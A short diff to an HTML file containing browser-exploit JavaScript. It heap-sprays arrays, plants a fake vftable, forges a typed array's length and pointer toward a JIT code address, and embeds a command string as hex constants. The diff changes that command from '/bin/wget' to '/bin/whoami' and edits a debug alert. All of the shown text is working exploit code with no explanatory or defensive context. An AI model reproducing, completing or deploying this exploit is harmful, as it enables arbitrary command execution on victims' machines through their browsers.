--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start576");
+alert("start56");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -158,8 +158,8 @@ spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
 spray[spray_index][typedarray_index+0x40/4]=0x6E69622F;
-spray[spray_index][typedarray_index+0x44/4]=0x6567772F;
-spray[spray_index][typedarray_index+0x48/4]=0x00000074;
+spray[spray_index][typedarray_index+0x44/4]=0x6568772F;
+spray[spray_index][typedarray_index+0x48/4]=0x00696d61;
 spray[spray_index][typedarray_index+0x4c/4]=0x0;
 spray[spray_index][typedarray_index+0x50/4]=0x0;
 var jit_index=typedarray_index+0x38/4;
